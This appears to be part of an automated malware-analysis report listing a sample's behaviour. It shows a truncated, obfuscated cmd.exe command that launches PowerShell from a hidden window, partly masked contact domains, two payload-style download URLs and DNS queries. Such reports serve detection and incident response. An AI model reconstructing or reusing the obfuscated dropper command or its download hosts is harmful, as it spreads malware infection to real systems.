Technical Information
- '<SYSTEM32>\cmd.exe' hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %ifQsQZihNRApwzp%=PHuSdzTw&&set %AakwrzPzEZLGaa%=o^we^r^s&&set %ZRBYwUiwhVsFaja%=wqQwBclO&&set %a...
- 'ro####oadauto.com':80
- 'do####nlimited.com':80
- 'ch##.com.br':80
- 'ch##.com.br':443
- http://www.ro####oadauto.com/dY2ir1/
- http://www.ch##.com.br/nE2LTY/
- 'ch##.com.br':443
- DNS ASK ro####oadauto.com
- DNS ASK cz###tudy.site
- DNS ASK do####nlimited.com
- DNS ASK ju####sharvard.com
- DNS ASK ch##.com.br
- '<SYSTEM32>\cmd.exe' hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %ifQsQZihNRApwzp%=PHuSdzTw&&set %AakwrzPzEZLGaa%=o^we^r^s&&set %ZRBYwUiwhVsFaja%=wqQwBclO&&set %a...' (with hidden window)